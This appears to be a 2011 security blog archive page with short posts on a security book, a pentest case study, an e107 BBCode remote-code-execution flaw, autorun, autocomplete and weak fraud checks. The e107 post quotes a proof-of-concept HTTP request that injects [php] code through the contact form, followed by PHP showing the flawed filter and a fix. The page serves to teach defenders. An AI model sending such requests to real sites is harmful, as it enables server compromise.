Posts

Showing posts from January, 2011

[Book-Review] The Myths of Security: What the Computer Security Industry Doesn't Want You to Know

This book, written by John Viega, is aimed mainly at non-security IT professionals and technically savvy readers. The author lays out his views on why AV fails, why we can still get owned even though we take precautions against threats, why HTTPS fails, why IDS sucks, why CAPTCHA sucks, why responsible disclosure isn't responsible, and why application security hasn't been achieved and may never be.
With used copies priced at around $7.36, it's worth learning from someone who has been in IT security for many years and has written several security books (Building Secure Software, Secure Programming Cookbook, 19 Deadly Sins of Software Security, etc.).

Common Enterprise Weakness: Only scan this and that server

Case Study:
https://www.trustwave.com/downloads/Trustwave-Case-Study-Internal-Penetration-Test.pdf


Analysis:
The TrustWave team pointed out that, starting from an insecure network segment, they eventually compromised the highly critical network segment that processes payment card information.

Lesson Learnt:
Based on our experience, small and medium (sometimes even large) enterprises nowadays hire pentest services only for their critical servers, while failing to secure the workstations on their other network segments. Password issues (weak passwords, blank passwords on both the OS and on database/commercial application servers) remain common in some organizations because of lazy system admins, even where a written policy requires strong passwords.
According to the case study, the TrustWave team would have found it harder to attack the presumably hardened payment card network if they had targeted only that segment. We're sure that TrustWave would explain to and negotiate w…

e107 Remote Code Execution via BBCode (aka Attacking Flaws in BBCode)

Vulnerability:
http://php-security.org/2010/05/19/mops-2010-035-e107-bbcode-remote-php-code-execution-vulnerability/index.html


Analysis:
For the sole reason of giving full capability and control over the application, today's web developers often provide a feature that lets application admin users run arbitrary PHP code through the application. e107 CMS is not the only one; Drupal CMS has this feature too.


[CODE] $text = preg_replace("#\[(php)#i", "[\\1", $text); [/CODE]
PoC exploit is noted as:

--------------------------------------------------------------------------------------------
POST /contact.php HTTP/1.1
Host: xxxx
User-Agent: e107 0.7.20 Remote Code Execution Exploit
Content-Type: application/x-www-form-urlencoded
Content-Length: 65

send-contactus=1&author_name=[php]phpinfo()%3bdie()%3b[/php]
--------------------------------------------------------------------------------------------

Similarly, AEF (Advanced Electron Forum) had a flawed bbCode implementati…
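The preg_replace quoted above captures "php" and writes it back after the same opening bracket, so the text is returned unchanged and the [php] tag reaches the bbcode parser intact. The example below is added here and is not e107 project code; it demonstrates that no-op and one way a maintainer can neutralise the tag before parsing (function names are assumptions for this example).

```php
<?php
// Added example, not e107 project code: shows why the filter quoted above
// leaves [php] tags untouched, and one way to neutralise them before the
// bbcode parser runs. Function names are assumptions for this example.

// The filter as quoted from e107: "[php" is captured and written back as
// "[php", so the returned string is identical to the input.
function flawed_php_filter(string $text): string
{
    return preg_replace("#\[(php)#i", "[\\1", $text);
}

// Corrected filter: replace the opening bracket of [php] and [/php] with its
// HTML entity so the parser no longer recognises the tag. Case-insensitive,
// like the original, so [PHP] is caught as well.
function fixed_php_filter(string $text): string
{
    return preg_replace("#\[(/?)php\]#i", "&#91;\\1php]", $text);
}

// Returns true when a [php] or [/php] tag survives filtering; this is the
// check a reviewer can run against both filters.
function contains_php_tag(string $text): bool
{
    return preg_match("#\[/?php\]#i", $text) === 1;
}

// Constructed input modelled on the author_name field of the PoC request above.
$payload = "[php]phpinfo();die();[/php]";

// The flawed filter leaves the tag in place; the corrected one removes it.
var_dump(contains_php_tag(flawed_php_filter($payload)));
var_dump(contains_php_tag(fixed_php_filter($payload)));
echo fixed_php_filter($payload), PHP_EOL;
```

Escaping the bracket is only a stop-gap for a page like contact.php that feeds untrusted input to the parser; the durable fix is to run the bbcode parser with PHP-tag support disabled for anything that is not admin-authored.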

Few Banking Security Resources

Autorun

One of the reasons malware spreads via readable/writable media on the Windows platform is that Windows itself enables Autorun by default. Some applications even ask users to enable Autorun if it is disabled.

Hacking Auto-Complete

Jeremiah's Research:
http://www.slideshare.net/jeremiahgrossman/breaking-browsers-hacking-autocomplete-blackhat-usa-2010


Established Recommendation:
Disable autocomplete by setting autocomplete="off" on the password input tag.
This is ignored by the vast majority of web developers today.


Myth:
Before Jeremiah's research, it was widely believed that the autocomplete issue was ONLY a local privacy issue: an attacker with physical access to a victim's machine could read the browser's autocomplete values, and nothing more.


Lesson Learnt:
Revisit security recommendations that were issued for issues considered low-risk or impossible to exploit.

Work harder, or think outside the box, to build a compelling PoC that turns such a low-risk issue into a medium- or high-risk one.

Weak Fraud Check vulnerable to Brute Force

We've seen fraud checks used in some web applications, such as billing systems and email registration (Gmail, for example). Here, developers still follow a traditional habit: verification by digits only.